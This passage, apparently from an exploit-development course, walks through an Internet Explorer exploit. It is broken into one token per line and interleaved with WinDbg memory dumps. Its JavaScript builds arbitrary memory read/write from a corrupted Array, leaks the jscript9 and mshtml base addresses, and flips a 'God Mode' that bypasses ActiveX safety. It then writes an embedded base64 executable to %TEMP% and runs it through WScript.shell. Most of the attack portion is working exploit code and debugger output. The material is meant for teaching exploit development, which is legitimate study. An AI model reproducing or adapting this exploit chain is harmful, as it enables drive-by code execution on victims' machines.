delta
)/
4
]
 
=
 
val
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 503 
-
 
      
a
[
idx
+
2
][
0
]
 
=
 
obj
;
 
      
return
 
read
(
base_addr
 
+
 
0x10000
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable' = jscript9 + 0x2d50
 
    
//  
    v
 
    
//  04ab2d50 151f1ec0 00000000 00000000
 
    
//  6f5569ce 00000000 0085f5d8 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x1569ce
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
jscript
9
 
=
 
read
(
addr
)
 
-
 
0x2d50
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x1569ce
;
 
    
var
 
old1
 
=
 
read
(
mshtml
+
0xebcd98
+
0x10
);
 
    
var
 
old2
 
=
 
read
(
mshtml
+
0xebcd98
+
0x14
);
 
 
function
 
GodModeOn
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
jscript9
+
0x155e19
);
 
      
write
(
ms
html
+
0xebcd98
+
0x14
,
 
jscript9
+
0x155d7d
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
old1
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
old2
);
 
    
}
 
 
// content of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAA
AAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream.Ty
pe
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStre
am
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
try
 
{
 
        
bStream.SaveT
oFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 504 
-
 
      
tStream.Close
();
 
      
bStream.Close
();
 
      
return
 
1
;
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window.ato
b
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
lo
w
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
GodModeOn
();
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
GodModeOff
();
 
    
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
//      alert("SaveToFile failed");
 
      
window.location.reload
();
 
      
return
 
0
;
 
    
}
 
    
shell.Exec
(
fname
);
 
    
alert
(
"Done"
);
 
  
}
 
</script>
 
</head>
 
<body>
<v:group id="vml" style="width:500pt;">
<div></div>
</group>
</body>
 
</html>
 
 
I snipped 
runcalc
. You can download the full code from here: 
code6
.
 
Wh
en we try it, a familiar dialog box pops up:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 505 
-
 
 
This means that something changed and the 
God Mode
 doesn’t work anymore.
 
Let’s start 
by adding two alerts to check that the variables 
jscript9
 and 
mshtml
 contain the correct base 
addresses:
 
JavaScript
 
 
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projec
tion::ArrayObjectInstance::`vftable' = jscript9 + 0x2d50
 
    
//      v
 
    
//  04ab2d50 151f1ec0 00000000 00000000
 
    
//  6f5569ce 00000000 0085f5d8 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x1569ce
 
  
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x2d50
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x1569ce
;
 
    
alert
(
jscript9
.
toString
(
16
));
 
    
alert
(
mshtml
.
toString
(
16
));
 
 
When we reload the page in IE we discover that the two v
ariables contain incorrect values. Let’s modify the 
code again to find out what’s wrong:
 
JavaScript
 
 
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjec
tInstance::`vftable' = jscript9 + 0x2d50
 
    
//      v
 
    
//  04ab2d50 151f1ec0 00000000 00000000
 
    
//  6f5569ce 00000000 0085f5d8 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x1569ce
 
    
var
 
addr
 
=
 
get
_addr
(
document
.
createElement
(
"div"
));
 
    
alert
(
addr
.
toString
(
16
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x2d50
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x1569ce
;
 
 
When we analyze the object at the address 
addr
, we realize that something is missing:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 506 
-
 
0:021> dd 3c600e0
 
03c6
00e0  6cd75480 03c54120 00000000 03c6cfa0
 
03c600f0  029648a0 03c6af44 03c6af74 00000000
 
03c60100  6cd7898c 00000001 00000009 00000000
 
03c60110  0654d770 00000000 00000000 00000000
 
03c60120  6cd75480 03c54120 00000000 03c6c000
 
03c60130  029648a0 03c6a3d4 03
c6af44 00000000
 
03c60140  6cd75480 03c54120 00000000 03c6cfb0
 
03c60150  029648a0 029648c0 03c60194 00000000
 
0:021> ln 6cd75480
 
(6cd75480)   jscript9!HostDispatch::`vftable'   |  (6cd755d8)   jscript9!Js::ConcatStringN<4>::`vftable'
 
Exact matches:
 
    jscri
pt9!HostDispatch::`vftable' = <no type information>
 
0:021> ln 029648a0
 
0:021> dds 3c600e0
 
03c600e0  6cd75480 jscript9!HostDispatch::`vftable'
 
03c600e4  03c54120
 
03c600e8  00000000
 
03c600ec  03c6cfa0
 
03c600f0  029648a0
 
03c600f4  03c6af44
 
03c600f8  03c6af74
 
03c600fc  00000000
 
03c60100  6cd7898c jscript9!HostVariant::`vftable'
 
03c60104  00000001
 
03c60108  00000009
 
03c6010c  00000000
 
03c60110  0654d770
 
03c60114  00000000
 
03c60118  00000000
 
03c6011c  00000000
 
03c60120  6cd75480 jscript9!HostDispatch::`vftable'
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 507 
-
 
0
3c60124  03c54120
 
03c60128  00000000
 
03c6012c  03c6c000
 
03c60130  029648a0
 
03c60134  03c6a3d4
 
03c60138  03c6af44
 
03c6013c  00000000
 
03c60140  6cd75480 jscript9!HostDispatch::`vftable'
 
03c60144  03c54120
 
03c60148  00000000
 
03c6014c  03c6cfb0
 
03c60150  02964
8a0
 
03c60154  029648c0
 
03c60158  03c60194
 
03c6015c  00000000
 
How can we determine the base address of 
mshtml.dll
 without a pointer to a vftable in it?
 
We need to find another way. For now, we learned that the 
div
 element is represented by an object of type
 
jscript9!HostDispatch
. But we’ve already seen this object in action. Do you remember the stack trace of the 
crash? Here it is again:
 
0:007> k 10
 
ChildEBP RetAddr  
 
0a53b790 0a7afc25 MSHTML!CMarkup::IsConnectedToPrimaryMarkup
 
0a53b7d4 0aa05cc6 MSHTML!CMark
up::OnCssChange+0x7e
 
0a53b7dc 0ada146f MSHTML!CElement::OnCssChange+0x28
 
0a53b7f4 0a84de84 MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldD
efaultValue''+0x4a64
 
0a53b860 0a84dedd MSHTML!SetNumberPropertyHelpe
r<long,CSetIntegerPropertyHelper>+0x1d3
 
0a53b880 0a929253 MSHTML!NUMPROPPARAMS::SetNumberProperty+0x20
 
0a53b8a8 0ab8b117 MSHTML!CBase::put_BoolHelper+0x2a
 
0a53b8c0 0ab8aade MSHTML!CBase::put_Bool+0x24
 
0a53b8e8 0aa3136b MSHTML!GS_VARIANTBOOL+0xaa
 
0a53b97c 0
aa32ca7 MSHTML!CBase::ContextInvokeEx+0x2b6
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 508 
-
 
0a53b9a4 0a93b0cc MSHTML!CElement::ContextInvokeEx+0x4c
 
0a53b9d0 0a8f8f49 MSHTML!CLinkElement::VersionedInvokeEx+0x49
 
0a53ba08 6ef918eb MSHTML!CBase::PrivateInvokeEx+0x6d
 
0a53ba6c 6f06abdc jscript9!HostDispatch::
CallInvokeEx+0xae
 
0a53bae0 6f06ab30 jscript9!HostDispatch::PutValueByDispId+0x94
 
0a53baf8 6f06aafc jscript9!HostDispatch::PutValue+0x2a
 
In particular, look at these two lines:
 
0a53ba08 6ef918eb MSHTML!CBase::PrivateInvokeEx+0x6d
 
0a53ba6c 6f06abdc jscript9!
HostDispatch::CallInvokeEx+0xae
 
It’s clear that 
jscript9!HostDispatch::CallInvokeEx
 knows the address of the function 
MSHTML!CBase::PrivateInvokeEx
 and if we’re lucky, this address is reachable from the object 
HostDispatch
 
(remember that we know the addres
s of an object of this very type).
 
Let’s examine 
jscript9!HostDispatch::CallInvokeEx
 in 
IDA
. Load 
jscript9
 in IDA and then press 
Ctrl+P
 to 
locate 
CallInvokeEx
. Now you can click on any instruction to see its offset relative to the current function. We 
want
 to locate the instruction at offset 
0xae
 of 
CallInvokeEx
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 509 
-
 
 
It looks like the address of 
MSHTML!CBase::PrivateInvokeEx
 is at the ad
dress 
eax+20h
.
 
As we did with the UAF bugs, we’ll try to determine where the address of 
MSHTML!CBase::PrivateInvokeEx
 
comes from:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 510 
-
 
Now we’ll need to examine the function 
GetHostVariantWrapper
:
 

exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 
511 
-
 
 
By merging the schemata, we get the following:
 
X = [this+0ch]
 
var_14 = [X+8]
 
X = var_14
 
obj_ptr = [X+10h]
 
More simply:
 
X = [this+0ch]
 
X = [X+8]
 
obj_ptr = [X+10h]
 
Let’s see if we’re right. Le
t’s reload the html page in IE and examine the 
div
 element again:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 512 
-
 
0:022> dd 5360f20
 
05360f20  6cc55480 05354280 00000000 0536cfb0
 
05360f30  0419adb0 0536af74 0536afa4 00000000
 
05360f40  6cc5898c 00000001 00000009 00000000
 
05360f50  00525428 00000000 000000
00 00000000
 
05360f60  05360f81 00000000 00000000 00000000
 
05360f70  00000000 00000000 00000000 00000000
 
05360f80  05360fa1 00000000 00000000 00000000
 
05360f90  00000000 00000000 00000000 00000000
 
0:022> ln 6cc55480
 
(6cc55480)   jscript9!HostDispatch::`vfta
ble'   |  (6cc555d8)   jscript9!Js::ConcatStringN<4>::`vftable'
 
Exact matches:
 
    jscript9!HostDispatch::`vftable' = <no type information>
 
0:022> dd poi(5360f20+c)
 
0536cfb0  6cc52d44 00000001 05360f00 00000000
 
0536cfc0  6cc52d44 00000001 05360f40 00000000
 
0536cfd0  0536cfe1 00000000 00000000 00000000
 
0536cfe0  0536cff1 00000000 00000000 00000000
 
0536cff0  0536cf71 00000000 00000000 00000000
 
0536d000  6cc54534 0535d8c0 00000000 00000005
 
0536d010  00004001 047f0010 053578c0 00000000
 
0536d020  00000001 053387
60 00000000 00000000
 
0:022> ln 6cc52d44
 
(6cc52d44)   jscript9!DummyVTableObject::`vftable'   |  (6cc52d50)   jscript9!Projection::ArrayObjectInstance::`vftable'
 
Exact matches:
 
    jscript9!Projection::UnknownEventHandlingThis::`vftable' = <no type informat
ion>
 
    jscript9!Js::FunctionInfo::`vftable' = <no type information>
 
    jscript9!Projection::UnknownThis::`vftable' = <no type information>
 
    jscript9!Projection::NamespaceThis::`vftable' = <no type information>
 
    jscript9!Js::WinRTFunctionInfo::`vft
able' = <no type information>
 
    jscript9!RefCountedHostVariant::`vftable' = <no type information>
 
    jscript9!DummyVTableObject::`vftable' = <no type information>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 513 
-
 
    jscript9!Js::FunctionProxy::`vftable' = <no type information>
 
0:022> dd poi(poi(5360f2
0+c)+8)
 
05360f00  6cc5898c 00000005 00000009 00000000
 
05360f10  00565d88 00000000 00000000 00000000
 
05360f20  6cc55480 05354280 00000000 0536cfb0
 
05360f30  0419adb0 0536af74 0536afa4 00000000
 
05360f40  6cc5898c 00000001 00000009 00000000
 
05360f50  00525428
 00000000 00000000 00000000
 
05360f60  05360f81 00000000 00000000 00000000
 
05360f70  00000000 00000000 00000000 00000000
 
0:022> ln 6cc5898c
 
(6cc5898c)   jscript9!HostVariant::`vftable'   |  (6cc589b5)   jscript9!Js::CustomExternalObject::SetProperty
 
Exact m
atches:
 
    jscript9!HostVariant::`vftable' = <no type information>
 
0:022> dd poi(poi(poi(5360f20+c)+8)+10)
 
00565d88  6f03eb04 00000001 00000000 00000008
 
00565d98  00000000 05360f08 00000000 00000000
 
00565da8  00000022 02000400 00000000 00000000
 
00565db8  
07d47798 07d47798 5c0cccc8 88000000
 
00565dc8  003a0043 0057005c 006e0069 006f0064
 
00565dd8  00730077 0073005c 00730079 00650074
 
00565de8  0033006d 005c0032 00580053 002e0053
 
00565df8  004c0044 0000004c 5c0cccb0 88000000
 
0:022> ln 6f03eb04
 
(6f03eb04)   MSHT
ML!CDivElement::`vftable'   |  (6ede7f24)   MSHTML!s_propdescCDivElementnofocusrect
 
Exact matches:
 
    MSHTML!CDivElement::`vftable' = <no type information>
 
Bingo! Our problems are solved! Now let’s compute the 
RVA
 of the vftable just found:
 
0:005> ? 6f03e
b04
-
mshtml
 
Evaluate expression: 3861252 = 003aeb04
 
We also need to compute the RVA for 
jscript9!HostDispatch::`vftable’
:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 514 
-
 
0:005> ? 6cc55480
-
jscript9
 
Evaluate expression: 21632 = 00005480
 
Now change the code as follows:
 
JavaScript
 
 
// Here's the beginnin
g of the element div:
 
    
//      +
-----
 jscript9!HostDispatch::`vftable' = jscript9 + 0x5480
 
    
//      v
 
    
//  6cc55480 05354280 00000000 0536cfb0
 
    
//
 
    
// To find the vftable MSHTML!CDivElement::`vftable', we must follow a chain of pointers:
 
   
//   X = [div_elem+0ch]
 
    
//   X = [X+8]
 
    
//   obj_ptr = [X+10h]
 
    
//   vftptr = [obj_ptr]
 
    
// where vftptr = vftable MSHTML!CDivElement::`vftable' = mshtml + 0x3aeb04.
 
    
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x5480
;
 
    
mshtml
 
=
 
read
(
read
(
read
(
read
(
addr
 
+
 
0xc
)
 
+
 
8
)
 
+
 
0x10
))
 
-
 
0x3aeb04
;
 
    
alert
(
jscript9
.
toString
(
16
));
 
    
alert
(
mshtml
.
toString
(
16
));
 
    
return
;
 
 
Try it out: is should work just fine!
 
Now remove the two alerts and the return. Mmm... the c
alculator doesn’t appear, so there must be 
something wrong (again!). To see what’s wrong, we can rely on the 
Developer Tools
. It seems that when the 
Developer Tools are enabled our 
God Mode
 doesn’t work. Just authorize the execution of the 
ActiveXObject
 
an
d you should see the following error:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 515 
-
 
 
Luckily, the problem is quite simple: 
atob
 isn’t available in 
IE 9
. I found a 
polyfill
 for atob here:
 
https://github.com/Modernizr/Modernizr/wiki/HTML5
-
Cross
-
Browser
-
Polyfills#base64
-
windowatob
-
and
-
windowbtoa
 
Here’s the modified code:
 
XHTML
 
 
<html
 
xmlns:v
=
"urn:schemas
-
microsoft
-
com:vml"
>
 
<head
 id=
"haed"
>
 
<title>
IE Case Study 
-
 STEP1
</title>
 
<style>
 
        v
\
:*{Behavior: url(#default#VML)}
 
</style>
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE9"
 
/>
 
<script
 language=
"javascript"
>
 
  
window.onload
 
=
 
function
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0
x10000
 
-
 
header_size
)/
4
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 516 
-
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
      
a
[
i
][
0
]
 
=
 
0
;
 
    
}
 
    
magic_addr
 
=
 
0xc000000
;
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffe
r header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 00000000 00000000 00000001 00003ff8 00000000
 
    
//                                                       array_len buf_len
 
    
alert
(
"Modify the 
\
"Buffer length
\
" field of the Array at 0
x"
 
+
 
magic_addr.toString
(
16
));
 
    
// Locate the modified Array.
 
    
var
 
idx
 
=
 
-
1
;
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to modify the first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If 
we successfully modified the first element of the next Array, then a[i]
 
      
// is the Array whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
        
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
      
alert
(
"Can't find the modified
 Array"
);
 
      
return
;
 
    
}
 
    
// Modify the second Array for reading/writing everywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
][
array_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0
x10000
 
+
 
header_size
;
 
    
// Very Important:
 
    
//    The numbers in Array are signed int32. Numbers greater than 0x7fffffff are
 
    
//    converted to 64
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx
+1][index] = 0xc1a0c1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed int32.
 
    
//    We'll need to represent 0xc1a0c1a0 as a negative integer:
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
 
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
return
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 517 
-
 
 
// The value returned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// v
al must be in [0, 0xffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 
= (2^32 
-
 x)/4
 
        
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
]
 
=
 
val
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
a
[
idx
+
2
][
0
]
 
=
 
obj
;
 
      
return
 
read
(
base_addr
 
+
 
0x10000
);
 
    
}
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!
HostDispatch::`vftable' = jscript9 + 0x5480
 
    
//      v
 
    
//  6cc55480 05354280 00000000 0536cfb0
 
    
//
 
    
// To find the vftable MSHTML!CDivElement::`vftable', we must follow a chain of pointers:
 
    
//   X = [div_elem+0ch]
 
    
//   X = [X+8]
 
    
//
   obj_ptr = [X+10h]
 
    
//   vftptr = [obj_ptr]
 
    
// where vftptr = vftable MSHTML!CDivElement::`vftable' = mshtml + 0x3aeb04.
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x5480
;
 
    
mshtml
 
=
 
read
(
read
(
read
(
read
(
a
ddr
 
+
 
0xc
)
 
+
 
8
)
 
+
 
0x10
))
 
-
 
0x3aeb04
;
 
 
var
 
old1
 
=
 
read
(
mshtml
+
0xebcd98
+
0x10
);
 
    
var
 
old2
 
=
 
read
(
mshtml
+
0xebcd98
+
0x14
);
 
 
function
 
GodModeOn
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
jscript9
+
0x155e19
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
jscript9
+
0x155
d7d
);
 
    
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 518 
-
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
old1
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
old2
);
 
    
}
 
 
// content of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAA <snipped> AAAAAAAAAAAAAAAAAAAA
AAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStrea
m.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
try
 
{
 
        
bStream.SaveToFile
(
fname
,
 
2
);
     
// 2 = overwr
ites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
      
tStream.Close
();
 
      
bStream.Close
();
 
      
return
 
1
;
 
    
}
 
 
// decoder
 
    
// [https://gist.github.com/1020396] by [https://github.com/atk]
 
    
functio
n
 
atob
(
input
)
 
{
 
      
var
 
chars
 
=
 
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
;
 
      
var
 
str
 
=
 
String
(
input
).
replace
(
/=+$/
,
 
''
);
 
      
if
 
(
str.length
 
%
 
4
 
==
 
1
)
 
{
 
        
throw
 
new
 
InvalidCharacterError
(
"'atob' failed: The string to 
be decoded is not correctly encoded."
);
 
      
}
 
      
for
 
(
 
        
// initialize result and counters
 
        
var
 
bc
 
=
 
0
,
 
bs
,
 
buffer
,
 
idx
 
=
 
0
,
 
output
 
=
 
''
;
 
        
// get next character
 
        
buffer
 
=
 
str.charAt
(
idx
++);
 
        
// character found in tabl
e? initialize bit storage and add its ascii value;
 
        
~
buffer
 
&&
 
(
bs
 
=
 
bc
 
%
 
4
 
?
 
bs
 
*
 
64
 
+
 
buffer
 
:
 
buffer
,
 
          
// and if not first of each 4 characters,
 
          
// convert the first 8 bits to one ascii character
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 519 
-
 
          
bc
++
 
%
 
4
)
 
?
 
output
 
+=
 
String.fromCharCode
(
255
 
&
 
bs
 
>>
 
(
-
2
 
*
 
bc
 
&
 
6
))
 
:
 
0
 
      
)
 
{
 
        
// try to find character in table (0
-
63, not found => 
-
1)
 
        
buffer
 
=
 
chars.indexOf
(
buffer
);
 
      
}
 
      
return
 
output
;
 
    
}
 
 
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
ato
b
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
lo
w
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
GodModeOn
();
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
GodModeOff
();
 
    
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
      
alert
(
"SaveToFile failed"
);
 
      
window.location.reload
();
 
      
return
 
0
;
 
    
}
 
    
shell.Exec
(
fname
);
 
    
alert
(
"Done"
);
 
  
}
 
<
/script>
 
</head>
 
<body>
<v:group id="vml" style="width:500pt;">
<div></div>
</group>
</body>
 
</html>
 
 
As before, I snipped 
runcalc
. You can download the full code from here: 
c
ode7
.
 
Now the calculator pops up and everything seems to work fine until we get a crash. The crash doesn’t 
always happen but there’s definitely something wrong with the code. A crash is probably caused by an 
incorrect write. Since the 
God Mode
 works corre
ctly, the problem must be with the two writes right before the 
call to 
bStream.SaveToFile
.
 
Let’s comment out the two writes and try again. Perfect! Now there are no more crashes! But we can’t just 
leave out the two writes. If we use 
SimpleServer
, it doesn’
t work of course because the two writes are 
needed. Maybe surprisingly, if we add back the two writes, everything works just fine.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 520 
-
 
If we investigate things a bit, we discover that when the html page is loaded in IE directly from the hard disk, 
string_addr
 
points to a null dword. On the other hand, when the page is loaded by going to 
127.0.0.1
 and is 
served by SimpleServer, 
string_addr
 points to the 
Unicode
 string 
http://127.0.0.1/
. For this reason, we 
should change the code as follows:
 
JavaScript
 
 
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
if
 
(
read
(
string_addr
)
 
!=
 
0
)
 
{
         
// only when there is a string to overwrite
 
        
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
        
write
(
s
tring_addr
 
+
 
4
,
 
0x0000005c
